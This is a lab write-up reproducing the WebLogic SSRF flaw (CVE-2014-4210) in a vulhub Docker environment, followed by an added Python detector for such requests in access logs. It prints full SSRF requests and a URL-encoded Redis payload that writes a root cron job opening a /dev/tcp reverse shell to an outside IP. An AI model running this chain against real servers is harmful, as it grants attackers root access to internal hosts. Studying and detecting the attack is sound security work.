This experiment first uses SSRF to discover an unauthenticated Redis instance, then abuses that unauthenticated Redis to write a cron job and obtain a reverse shell. WebLogic contains an SSRF vulnerability that lets an attacker send arbitrary HTTP requests and thereby attack fragile components on the internal network such as Redis and FastCGI.[1]
ailx10
Prerequisites: have a Docker environment ready and vulhub downloaded, then enter the directory and begin reproducing the vulnerability.
docker-compose build   // optional
docker-compose up -d
After finishing the experiment, remember to tear down the vulnerable environment~~
docker-compose down
docker system prune -a -f   // optional
Simply visiting the site confirms that the WebLogic SSRF (CVE-2014-4210) environment was set up successfully.
Open Burp Suite and craft a request to http://127.0.0.1:7001; the access succeeds.
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: 144.34.162.13:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827
Connection: close

For a non-HTTP request, receiving "which did not have a valid SOAP content-type: null." indicates success.
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.16.2:6379 HTTP/1.1
Host: 144.34.162.13:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827
Connection: close

Reverse shell via a Redis-written cron job
test

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/174.137.58.6/9999 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

URL-encode it; note that every line break is \r\n.
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F174.137.58.6%2F9999%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0A

Reverse shell obtained.
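From the defender's side, the two requests above leave a clear footprint in the WebLogic access log: an operator= URL pointing at a loopback or private address, a non-HTTP port such as 6379, and URL-encoded CRLF carrying Redis commands. The detector below is an added example, not part of the original write-up; the sample request lines are constructed, the set of expected registry ports is an assumption, and appending the encoded payload to the operator URL path is an assumption about how it reaches the backend.

```python
"""Flag WebLogic UDDI-explorer requests whose operator= URL points at internal
hosts, non-HTTP ports, or carries CRLF-smuggled payloads such as Redis commands."""
import ipaddress
from urllib.parse import parse_qs, urlsplit

SSRF_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
EXPECTED_PORTS = {80, 443}  # assumption: public UDDI registries speak plain HTTP(S)
REDIS_MARKERS = ("config set dir", "config set dbfilename", "\nsave")

# Constructed sample request lines (not taken from the page's logs). The third appends
# a shortened, URL-encoded CRLF payload of the kind the write-up shows (assumed placement).
QUERY = ("rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor="
         "&selfor=Business+location&btnSubmit=Search&operator=")
BENIGN = f"GET {SSRF_PATH}?{QUERY}http://uddi.example.com/inquiry HTTP/1.1"
PROBE = f"GET {SSRF_PATH}?{QUERY}http://127.0.0.1:7001 HTTP/1.1"
REDIS_SMUGGLE = (f"GET {SSRF_PATH}?{QUERY}http://192.168.16.2:6379/test%0D%0A%0D%0A"
                 "config%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab"
                 "%0D%0Asave%0D%0A%0D%0A HTTP/1.1")


def inspect_request_line(request_line: str) -> list:
    """Return findings for one access-log request line; an empty list means benign."""
    findings = []
    fields = request_line.split(" ")
    if len(fields) < 2:
        return findings
    url = urlsplit(fields[1])
    if url.path != SSRF_PATH:
        return findings
    # parse_qs URL-decodes once, so operator is now the raw URL handed to the backend
    operator = parse_qs(url.query).get("operator", [""])[0]
    if "\r" in operator or "\n" in operator:
        findings.append("CRLF in operator: request smuggling into a non-HTTP service")
        if any(m in operator.lower() for m in REDIS_MARKERS):
            findings.append("operator carries Redis CONFIG SET / SAVE commands")
    # urlsplit strips \r and \n, so host/port parsing ignores the smuggled body
    target = urlsplit(operator)
    try:
        addr = ipaddress.ip_address(target.hostname or "")
        if addr.is_private or addr.is_loopback:
            findings.append(f"operator targets internal address {addr}")
    except ValueError:
        pass  # hostname rather than a literal IP: not classified here
    try:
        port = target.port
    except ValueError:
        port = None
    if port is not None and port not in EXPECTED_PORTS:
        findings.append(f"operator targets non-HTTP port {port}")
    return findings
```

Run it over the request field of each access-log entry; any non-empty result for this path is worth an alert, since the UDDI explorer has no legitimate reason to contact internal hosts or non-HTTP ports.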
References
[1] Weblogic SSRF vulnerability: https://github.com/Threekiii/Vulhub-Reproduce/blob/master/Weblogic%20SSRF%E6%BC%8F%E6%B4%9E.md